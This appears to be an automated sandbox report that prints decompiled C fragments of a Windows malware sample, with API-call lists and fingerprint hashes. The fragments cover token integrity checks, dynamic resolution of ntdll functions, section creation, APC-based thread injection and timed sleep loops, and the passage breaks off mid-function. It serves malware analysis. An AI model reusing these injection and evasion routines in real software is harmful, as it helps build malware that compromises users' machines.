                                                                                                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00A355DC
                                                                                                                                    • Part of subcall function 00A3502E: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,033A9370,00000000,?,74E5F710,00000000,74E5F730), ref: 00A3507D
                                                                                                                                    • Part of subcall function 00A3502E: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,033A93A8,?,00000000,30314549,00000014,004F0053,033A9364), ref: 00A3511A
                                                                                                                                    • Part of subcall function 00A3502E: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00A354EF), ref: 00A3512C
                                                                                                                                  • GetLastError.KERNEL32 ref: 00A355EE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                                                                                                  • String ID: Ut$@MtNt
                                                                                                                                  • API String ID: 3521023985-969920318
                                                                                                                                  • Opcode ID: 228e3dc9faf01126e674017af04cc8d5a12c4737ec722fe71fac231c8a18c7c9
                                                                                                                                  • Instruction ID: aadce857f530ab2c8e9ec5acda1d61b491719f0364b6acf763bda2fe745e5f7f
                                                                                                                                  • Opcode Fuzzy Hash: 228e3dc9faf01126e674017af04cc8d5a12c4737ec722fe71fac231c8a18c7c9
                                                                                                                                  • Instruction Fuzzy Hash: 185127B1C01228EBDF11DFE9DD449EEBFB9EF09720F204616F415A6190D7709A45DBA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 74%
                                                                                                                                  			E00A33598(intOrPtr __edx, void** _a4, void** _a8) {
                                                                                                                                  				intOrPtr _v8;
                                                                                                                                  				struct _FILETIME* _v12;
                                                                                                                                  				short _v56;
                                                                                                                                  				struct _FILETIME* _t12;
                                                                                                                                  				intOrPtr _t13;
                                                                                                                                  				void* _t17;
                                                                                                                                  				void* _t21;
                                                                                                                                  				intOrPtr _t27;
                                                                                                                                  				long _t28;
                                                                                                                                  				void* _t30;
                                                                                                                                  
                                                                                                                                  				_t27 = __edx;
                                                                                                                                  				_t12 =  &_v12;
                                                                                                                                  				GetSystemTimeAsFileTime(_t12);
                                                                                                                                  				_push(0x192);
                                                                                                                                  				_push(0x54d38000);
                                                                                                                                  				_push(_v8);
                                                                                                                                  				_push(_v12);
                                                                                                                                  				L00A3AECA();
                                                                                                                                  				_push(_t12);
                                                                                                                                  				_v12 = _t12;
                                                                                                                                  				_t13 =  *0xa3d2e0; // 0x296a5a8
                                                                                                                                  				_t5 = _t13 + 0xa3e876; // 0x33a8e1e
                                                                                                                                  				_t6 = _t13 + 0xa3e59c; // 0x530025
                                                                                                                                  				_push(0x16);
                                                                                                                                  				_push( &_v56);
                                                                                                                                  				_v8 = _t27;
                                                                                                                                  				L00A3ABEA();
                                                                                                                                  				_t17 = CreateFileMappingW(0xffffffff, 0xa3d2e4, 4, 0, 0x1000,  &_v56); // executed
                                                                                                                                  				_t30 = _t17;
                                                                                                                                  				if(_t30 == 0) {
                                                                                                                                  					_t28 = GetLastError();
                                                                                                                                  				} else {
                                                                                                                                  					if(GetLastError() == 0xb7) {
                                                                                                                                  						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                                                                                                                  						if(_t21 == 0) {
                                                                                                                                  							_t28 = GetLastError();
                                                                                                                                  							if(_t28 != 0) {
                                                                                                                                  								goto L6;
                                                                                                                                  							}
                                                                                                                                  						} else {
                                                                                                                                  							 *_a4 = _t30;
                                                                                                                                  							 *_a8 = _t21;
                                                                                                                                  							_t28 = 0;
                                                                                                                                  						}
                                                                                                                                  					} else {
                                                                                                                                  						_t28 = 2;
                                                                                                                                  						L6:
                                                                                                                                  						CloseHandle(_t30);
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return _t28;
                                                                                                                                  			}














                                                                                                                                  APIs
                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00A3529C,?,?,4D283A53,?,?), ref: 00A335A4
                                                                                                                                  • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00A335BA
                                                                                                                                  • _snwprintf.NTDLL ref: 00A335DF
                                                                                                                                  • CreateFileMappingW.KERNELBASE(000000FF,00A3D2E4,00000004,00000000,00001000,?), ref: 00A335FB
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00A3529C,?,?,4D283A53), ref: 00A3360D
                                                                                                                                  • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00A33624
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00A3529C,?,?), ref: 00A33645
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00A3529C,?,?,4D283A53), ref: 00A3364D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                  • String ID: @MtNt
                                                                                                                                  • API String ID: 1814172918-3251738875
                                                                                                                                  • Opcode ID: dd110f7a63ddc4e3c9b82050a2e4f115e51733b590ab18309b6bb2fe09c841a6
                                                                                                                                  • Instruction ID: 9c49a4481e95523e49b941a20a2afcfbba01861e650ab5c33b0008ed424081c3
                                                                                                                                  • Opcode Fuzzy Hash: dd110f7a63ddc4e3c9b82050a2e4f115e51733b590ab18309b6bb2fe09c841a6
                                                                                                                                  • Instruction Fuzzy Hash: 8721D273A04204FFDB11DBA4DC06F9E77B9AB55714F200025F606E72D0E770DA068B54
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 86%
                                                                                                                                  			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
                                                                                                                                  				long _v8;
                                                                                                                                  				void* __edi;
                                                                                                                                  				void* __esi;
                                                                                                                                  				void* __ebp;
                                                                                                                                  				char _t9;
                                                                                                                                  				void* _t10;
                                                                                                                                  				void* _t18;
                                                                                                                                  				void* _t23;
                                                                                                                                  				void* _t36;
                                                                                                                                  
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				_t9 = _a8;
                                                                                                                                  				_v8 = 1;
                                                                                                                                  				if(_t9 == 0) {
                                                                                                                                  					_t10 = InterlockedDecrement(0x6e8d4188);
                                                                                                                                  					__eflags = _t10;
                                                                                                                                  					if(_t10 == 0) {
                                                                                                                                  						__eflags =  *0x6e8d418c;
                                                                                                                                  						if( *0x6e8d418c != 0) {
                                                                                                                                  							_t36 = 0x2328;
                                                                                                                                  							while(1) {
                                                                                                                                  								SleepEx(0x64, 1);
                                                                                                                                  								__eflags =  *0x6e8d4198;
                                                                                                                                  								if( *0x6e8d4198 == 0) {
                                                                                                                                  									break;
                                                                                                                                  								}
                                                                                                                                  								_t36 = _t36 - 0x64;
                                                                                                                                  								__eflags = _t36;
                                                                                                                                  								if(_t36 > 0) {
                                                                                                                                  									continue;
                                                                                                                                  								}
                                                                                                                                  								break;
                                                                                                                                  							}
                                                                                                                                  							CloseHandle( *0x6e8d418c);
                                                                                                                                  						}
                                                                                                                                  						HeapDestroy( *0x6e8d4190);
                                                                                                                                  					}
                                                                                                                                  				} else {
                                                                                                                                  					if(_t9 == 1 && InterlockedIncrement(0x6e8d4188) == 1) {
                                                                                                                                  						_t18 = HeapCreate(0, 0x400000, 0); // executed
                                                                                                                                  						 *0x6e8d4190 = _t18;
                                                                                                                                  						_t41 = _t18;
                                                                                                                                  						if(_t18 == 0) {
                                                                                                                                  							L6:
                                                                                                                                  							_v8 = 0;
                                                                                                                                  						} else {
                                                                                                                                  							 *0x6e8d41b0 = _a4;
                                                                                                                                  							asm("lock xadd [eax], edi");
                                                                                                                                  							_push( &_a8);
                                                                                                                                  							_t23 = E6E8D153C(E6E8D1719, E6E8D1C35(_a12, 1, 0x6e8d4198, _t41));
                                                                                                                                  							 *0x6e8d418c = _t23;
                                                                                                                                  							if(_t23 == 0) {
                                                                                                                                  								asm("lock xadd [esi], eax");
                                                                                                                                  								goto L6;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return _v8;
                                                                                                                                  			}












                                                                                                                                  APIs
                                                                                                                                  • InterlockedIncrement.KERNEL32(6E8D4188), ref: 6E8D1B7B
                                                                                                                                  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6E8D1B90
                                                                                                                                    • Part of subcall function 6E8D153C: CreateThread.KERNELBASE ref: 6E8D1553
                                                                                                                                    • Part of subcall function 6E8D153C: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E8D1568
                                                                                                                                    • Part of subcall function 6E8D153C: GetLastError.KERNEL32(00000000), ref: 6E8D1573
                                                                                                                                    • Part of subcall function 6E8D153C: TerminateThread.KERNEL32(00000000,00000000), ref: 6E8D157D
                                                                                                                                    • Part of subcall function 6E8D153C: CloseHandle.KERNEL32(00000000), ref: 6E8D1584
                                                                                                                                    • Part of subcall function 6E8D153C: SetLastError.KERNEL32(00000000), ref: 6E8D158D
                                                                                                                                  • InterlockedDecrement.KERNEL32(6E8D4188), ref: 6E8D1BE3
                                                                                                                                  • SleepEx.KERNEL32(00000064,00000001), ref: 6E8D1BFD
                                                                                                                                  • CloseHandle.KERNEL32 ref: 6E8D1C19
                                                                                                                                  • HeapDestroy.KERNEL32 ref: 6E8D1C25
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682224691.000000006E8D1000.00000020.00020000.sdmp, Offset: 6E8D0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.682210972.000000006E8D0000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682249539.000000006E8D3000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682273423.000000006E8D5000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682314087.000000006E8D6000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                                                                                                                  • String ID: Tt
                                                                                                                                  • API String ID: 2110400756-3291821022
                                                                                                                                  • Opcode ID: 5fb0c542884707889908de6789a33be5e67e0192fe5a934506ecc0107e80e5f9
                                                                                                                                  • Instruction ID: 792de2e1cfda39e0c6f1dd243efab3d200e867a82ec99c9be0c377c6d15696bb
                                                                                                                                  • Opcode Fuzzy Hash: 5fb0c542884707889908de6789a33be5e67e0192fe5a934506ecc0107e80e5f9
                                                                                                                                  • Instruction Fuzzy Hash: 04216071644A1ABFCF40AFE9CC88A497BBCEF963647104C25E51AD3280E7348D4DCB90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E6E8D153C(long _a4, DWORD* _a12) {
                                                                                                                                  				_Unknown_base(*)()* _v0;
                                                                                                                                  				void* _t4;
                                                                                                                                  				long _t6;
                                                                                                                                  				long _t11;
                                                                                                                                  				void* _t13;
                                                                                                                                  
                                                                                                                                  				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6e8d41c0, 0, _a12); // executed
                                                                                                                                  				_t13 = _t4;
                                                                                                                                  				if(_t13 != 0) {
                                                                                                                                  					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
                                                                                                                                  					if(_t6 == 0) {
                                                                                                                                  						_t11 = GetLastError();
                                                                                                                                  						TerminateThread(_t13, _t11);
                                                                                                                                  						CloseHandle(_t13);
                                                                                                                                  						_t13 = 0;
                                                                                                                                  						SetLastError(_t11);
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return _t13;
                                                                                                                                  			}








                                                                                                                                  APIs
                                                                                                                                  • CreateThread.KERNELBASE ref: 6E8D1553
                                                                                                                                  • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E8D1568
                                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 6E8D1573
                                                                                                                                  • TerminateThread.KERNEL32(00000000,00000000), ref: 6E8D157D
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6E8D1584
                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 6E8D158D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682224691.000000006E8D1000.00000020.00020000.sdmp, Offset: 6E8D0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.682210972.000000006E8D0000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682249539.000000006E8D3000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682273423.000000006E8D5000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682314087.000000006E8D6000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                                                                                                  • String ID: @Mt MtTt
                                                                                                                                  • API String ID: 3832013932-608512568
                                                                                                                                  • Opcode ID: a3e12d27ea9e03ba0f8fe665f44db6d61d695f013d897db5bb330e5aba827574
                                                                                                                                  • Instruction ID: fac64c2c92b8789de26d2fa07770d40d233ac28258afc53ec452ae1ec4240553
                                                                                                                                  • Opcode Fuzzy Hash: a3e12d27ea9e03ba0f8fe665f44db6d61d695f013d897db5bb330e5aba827574
                                                                                                                                  • Instruction Fuzzy Hash: F0F0F872205A25BBDB125BE09C0CF9BBFA9FF1A751F004514F60D91190C7258C15CBE5
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00A34151(long* _a4) {
                                                                                                                                  				long _v8;
                                                                                                                                  				void* _v12;
                                                                                                                                  				void _v16;
                                                                                                                                  				long _v20;
                                                                                                                                  				int _t33;
                                                                                                                                  				void* _t46;
                                                                                                                                  
                                                                                                                                  				_v16 = 1;
                                                                                                                                  				_v20 = 0x2000;
                                                                                                                                  				if( *0xa3d294 > 5) {
                                                                                                                                  					_v16 = 0;
                                                                                                                                  					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                                                                                                                  						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                                                                                                                  						_v8 = 0;
                                                                                                                                  						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                                                                                                                  						if(_v8 != 0) {
                                                                                                                                  							_t46 = E00A375F6(_v8);
                                                                                                                                  							if(_t46 != 0) {
                                                                                                                                  								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                                                                                                                  								if(_t33 != 0) {
                                                                                                                                  									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                                                                                                                  								}
                                                                                                                                  								E00A34AAB(_t46);
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						CloseHandle(_v12);
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				 *_a4 = _v20;
                                                                                                                                  				return _v16;
                                                                                                                                  			}










                                                                                                                                  APIs
                                                                                                                                  • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00A34183
                                                                                                                                  • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 00A341A3
                                                                                                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 00A341B3
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00A34203
                                                                                                                                    • Part of subcall function 00A375F6: RtlAllocateHeap.NTDLL(00000000,00000000,00A34F70), ref: 00A37602
                                                                                                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 00A341D6
                                                                                                                                  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00A341DE
                                                                                                                                  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00A341EE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1295030180-0
                                                                                                                                  • Opcode ID: e2373dee8d6f0c12db50502d8c064a505ee38153a42010144a693e43922a49de
                                                                                                                                  • Instruction ID: b28e352b0054aa9d2be2a7e3c8551e51aa9fd25e5e152ecf90ff020f7875d9c9
                                                                                                                                  • Opcode Fuzzy Hash: e2373dee8d6f0c12db50502d8c064a505ee38153a42010144a693e43922a49de
                                                                                                                                  • Instruction Fuzzy Hash: AB215975900209FFEB10EFE4DD84EEEBBB9EB09704F0000A6F911A6161D7719A56DB60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E6E8D19C2(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                                  				intOrPtr _v8;
                                                                                                                                  				_Unknown_base(*)()* _t29;
                                                                                                                                  				_Unknown_base(*)()* _t33;
                                                                                                                                  				_Unknown_base(*)()* _t36;
                                                                                                                                  				_Unknown_base(*)()* _t39;
                                                                                                                                  				_Unknown_base(*)()* _t42;
                                                                                                                                  				intOrPtr _t46;
                                                                                                                                  				struct HINSTANCE__* _t50;
                                                                                                                                  				intOrPtr _t56;
                                                                                                                                  
                                                                                                                                  				_t56 = E6E8D1000(0x20);
                                                                                                                                  				if(_t56 == 0) {
                                                                                                                                  					_v8 = 8;
                                                                                                                                  				} else {
                                                                                                                                  					_t50 = GetModuleHandleA( *0x6e8d41c4 + 0x6e8d5014);
                                                                                                                                  					_v8 = 0x7f;
                                                                                                                                  					_t29 = GetProcAddress(_t50,  *0x6e8d41c4 + 0x6e8d5151);
                                                                                                                                  					 *(_t56 + 0xc) = _t29;
                                                                                                                                  					if(_t29 == 0) {
                                                                                                                                  						L8:
                                                                                                                                  						E6E8D1397(_t56);
                                                                                                                                  					} else {
                                                                                                                                  						_t33 = GetProcAddress(_t50,  *0x6e8d41c4 + 0x6e8d5161);
                                                                                                                                  						 *(_t56 + 0x10) = _t33;
                                                                                                                                  						if(_t33 == 0) {
                                                                                                                                  							goto L8;
                                                                                                                                  						} else {
                                                                                                                                  							_t36 = GetProcAddress(_t50,  *0x6e8d41c4 + 0x6e8d5174);
                                                                                                                                  							 *(_t56 + 0x14) = _t36;
                                                                                                                                  							if(_t36 == 0) {
                                                                                                                                  								goto L8;
                                                                                                                                  							} else {
                                                                                                                                  								_t39 = GetProcAddress(_t50,  *0x6e8d41c4 + 0x6e8d5189);
                                                                                                                                  								 *(_t56 + 0x18) = _t39;
                                                                                                                                  								if(_t39 == 0) {
                                                                                                                                  									goto L8;
                                                                                                                                  								} else {
                                                                                                                                  									_t42 = GetProcAddress(_t50,  *0x6e8d41c4 + 0x6e8d519f);
                                                                                                                                  									 *(_t56 + 0x1c) = _t42;
                                                                                                                                  									if(_t42 == 0) {
                                                                                                                                  										goto L8;
                                                                                                                                  									} else {
                                                                                                                                  										 *((intOrPtr*)(_t56 + 8)) = _a8;
                                                                                                                                  										 *((intOrPtr*)(_t56 + 4)) = _a4;
                                                                                                                                  										_t46 = E6E8D13B8(_t56, _a12); // executed
                                                                                                                                  										_v8 = _t46;
                                                                                                                                  										if(_t46 != 0) {
                                                                                                                                  											goto L8;
                                                                                                                                  										} else {
                                                                                                                                  											 *_a16 = _t56;
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return _v8;
                                                                                                                                  			}













                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E8D1000: HeapAlloc.KERNEL32(00000000,?,6E8D15ED,00000030,74E063F0,00000000), ref: 6E8D100C
                                                                                                                                  • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6E8D1051,?,?,?,?), ref: 6E8D19E6
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 6E8D1A08
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 6E8D1A1E
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 6E8D1A34
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 6E8D1A4A
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 6E8D1A60
                                                                                                                                    • Part of subcall function 6E8D13B8: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000), ref: 6E8D1415
                                                                                                                                    • Part of subcall function 6E8D13B8: memset.NTDLL ref: 6E8D1437
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682224691.000000006E8D1000.00000020.00020000.sdmp, Offset: 6E8D0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.682210972.000000006E8D0000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682249539.000000006E8D3000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682273423.000000006E8D5000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682314087.000000006E8D6000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1632424568-0
                                                                                                                                  • Opcode ID: 0f15332d3939e560c00237a559ef95ca479a52d15e0f2b5e182c22c70c814afa
                                                                                                                                  • Instruction ID: 107087f66c352e5a03e75107ed3ae6c5345916096e757059b9be0dc398e22d72
                                                                                                                                  • Opcode Fuzzy Hash: 0f15332d3939e560c00237a559ef95ca479a52d15e0f2b5e182c22c70c814afa
                                                                                                                                  • Instruction Fuzzy Hash: 03216BB0600B0BEFDB11EFA9CD80D9AB7ECEF452107014966E458E7251E730E909CBA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 74%
                                                                                                                                  			E00A3262F(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                  				struct _FILETIME _v12;
                                                                                                                                  				void* _t10;
                                                                                                                                  				void* _t12;
                                                                                                                                  				int _t14;
                                                                                                                                  				signed int _t16;
                                                                                                                                  				void* _t18;
                                                                                                                                  				signed int _t19;
                                                                                                                                  				unsigned int _t23;
                                                                                                                                  				void* _t27;
                                                                                                                                  				signed int _t34;
                                                                                                                                  
                                                                                                                                  				_t27 = __edx;
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				_t10 = HeapCreate(0, 0x400000, 0); // executed
                                                                                                                                  				 *0xa3d270 = _t10;
                                                                                                                                  				if(_t10 != 0) {
                                                                                                                                  					 *0xa3d160 = GetTickCount();
                                                                                                                                  					_t12 = E00A31A24(_a4);
                                                                                                                                  					if(_t12 == 0) {
                                                                                                                                  						do {
                                                                                                                                  							GetSystemTimeAsFileTime( &_v12);
                                                                                                                                  							_t14 = SwitchToThread();
                                                                                                                                  							_t23 = _v12.dwHighDateTime;
                                                                                                                                  							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
                                                                                                                                  							_push(0);
                                                                                                                                  							_push(0x13);
                                                                                                                                  							_push(_t23 >> 5);
                                                                                                                                  							_push(_t16);
                                                                                                                                  							L00A3B02E();
                                                                                                                                  							_t34 = _t14 + _t16;
                                                                                                                                  							_t18 = E00A34F23(_a4, _t34);
                                                                                                                                  							_t19 = 3;
                                                                                                                                  							_t26 = _t34 & 0x00000007;
                                                                                                                                  							Sleep(_t19 << (_t34 & 0x00000007)); // executed
                                                                                                                                  						} while (_t18 == 1);
                                                                                                                                  						if(E00A327C7(_t26) != 0) {
                                                                                                                                  							 *0xa3d298 = 1; // executed
                                                                                                                                  						}
                                                                                                                                  						_t12 = E00A3520D(_t27); // executed
                                                                                                                                  					}
                                                                                                                                  				} else {
                                                                                                                                  					_t12 = 8;
                                                                                                                                  				}
                                                                                                                                  				return _t12;
                                                                                                                                  			}














                                                                                                                                  APIs
                                                                                                                                  • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,00A31900,?), ref: 00A32642
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00A32656
                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,00A31900,?), ref: 00A32672
                                                                                                                                  • SwitchToThread.KERNEL32(?,00000001,?,?,?,00A31900,?), ref: 00A32678
                                                                                                                                  • _aullrem.NTDLL(?,?,00000013,00000000), ref: 00A32695
                                                                                                                                  • Sleep.KERNELBASE(00000003,00000000,?,00000001,?,?,?,00A31900,?), ref: 00A326B2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 507476733-0
                                                                                                                                  • Opcode ID: a707bab7fcff4bb828d443eb68bfc7675a11cf50aadc49dda1d881d0b87bc173
                                                                                                                                  • Instruction ID: 10b25f6d828e2494c01fca3aa316eb4ec301eb8a116be069dd08ef1eaf6d6139
                                                                                                                                  • Opcode Fuzzy Hash: a707bab7fcff4bb828d443eb68bfc7675a11cf50aadc49dda1d881d0b87bc173
                                                                                                                                  • Instruction Fuzzy Hash: 5011E972A40304ABD7149BF4EC1BF5A77E8EB48361F100125FA05D6190FBB0D44187A0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 62%
                                                                                                                                  			E00A34F07(void* __eax) {
                                                                                                                                  				long _v8;
                                                                                                                                  				char _v12;
                                                                                                                                  				char _v16;
                                                                                                                                  				intOrPtr _v20;
                                                                                                                                  				void* _v24;
                                                                                                                                  				void* __esi;
                                                                                                                                  				void* _t41;
                                                                                                                                  				char* _t42;
                                                                                                                                  				long _t43;
                                                                                                                                  				void* _t46;
                                                                                                                                  				intOrPtr _t47;
                                                                                                                                  				intOrPtr* _t48;
                                                                                                                                  				char _t50;
                                                                                                                                  				long _t54;
                                                                                                                                  				char* _t55;
                                                                                                                                  				long _t56;
                                                                                                                                  				intOrPtr* _t57;
                                                                                                                                  				void* _t60;
                                                                                                                                  				void* _t61;
                                                                                                                                  				void* _t68;
                                                                                                                                  				void* _t72;
                                                                                                                                  				void* _t73;
                                                                                                                                  				void* _t74;
                                                                                                                                  				void* _t78;
                                                                                                                                  
                                                                                                                                  				_t72 = __eax;
                                                                                                                                  				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
                                                                                                                                  					L2:
                                                                                                                                  					_t41 = _t72;
                                                                                                                                  					_pop(_t73);
                                                                                                                                  					_t74 = _t41;
                                                                                                                                  					_t42 =  &_v12;
                                                                                                                                  					_v8 = 0;
                                                                                                                                  					_v16 = 0;
                                                                                                                                  					__imp__( *((intOrPtr*)(_t74 + 0x18)), _t42, _t68, _t73, _t61, _t78); // executed
                                                                                                                                  					if(_t42 == 0) {
                                                                                                                                  						_t43 = GetLastError();
                                                                                                                                  						_v8 = _t43;
                                                                                                                                  						if(_t43 == 0x2efe) {
                                                                                                                                  							_v8 = 0;
